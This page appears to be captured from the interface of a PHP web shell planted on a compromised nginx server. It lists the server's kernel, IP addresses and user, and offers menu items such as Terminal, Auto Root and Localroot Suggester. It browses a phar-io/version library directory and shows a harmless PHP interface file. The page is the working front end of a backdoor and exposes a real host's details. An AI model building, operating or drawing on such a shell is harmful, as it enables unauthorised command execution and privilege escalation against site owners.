Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.133.142.101
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
3 /
phar-io /
version /
src /
constraints /
Delete
Unzip
Name
Size
Permission
Date
Action
AbstractVersionConstraint.php
753
B
-rw-r--r--
2018-07-08 09:00
AndVersionConstraintGroup.php
1.04
KB
-rw-r--r--
2018-07-08 09:00
AnyVersionConstraint.php
648
B
-rw-r--r--
2018-07-08 09:00
ExactVersionConstraint.php
602
B
-rw-r--r--
2018-07-08 09:00
GreaterThanOrEqualToVersionConstraint.php
1.01
KB
-rw-r--r--
2018-07-08 09:00
OrVersionConstraintGroup.php
1.04
KB
-rw-r--r--
2018-07-08 09:00
SpecificMajorAndMinorVersionConstraint.php
1.09
KB
-rw-r--r--
2018-07-08 09:00
SpecificMajorVersionConstraint.php
885
B
-rw-r--r--
2018-07-08 09:00
VersionConstraint.php
566
B
-rw-r--r--
2018-07-08 09:00
Save
Rename
<?php /* * This file is part of PharIo\Version. * * (c) Arne Blankerts <arne@blankerts.de>, Sebastian Heuer <sebastian@phpeople.de>, Sebastian Bergmann <sebastian@phpunit.de> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace PharIo\Version; interface VersionConstraint { /** * @param Version $version * * @return bool */ public function complies(Version $version); /** * @return string */ public function asString(); }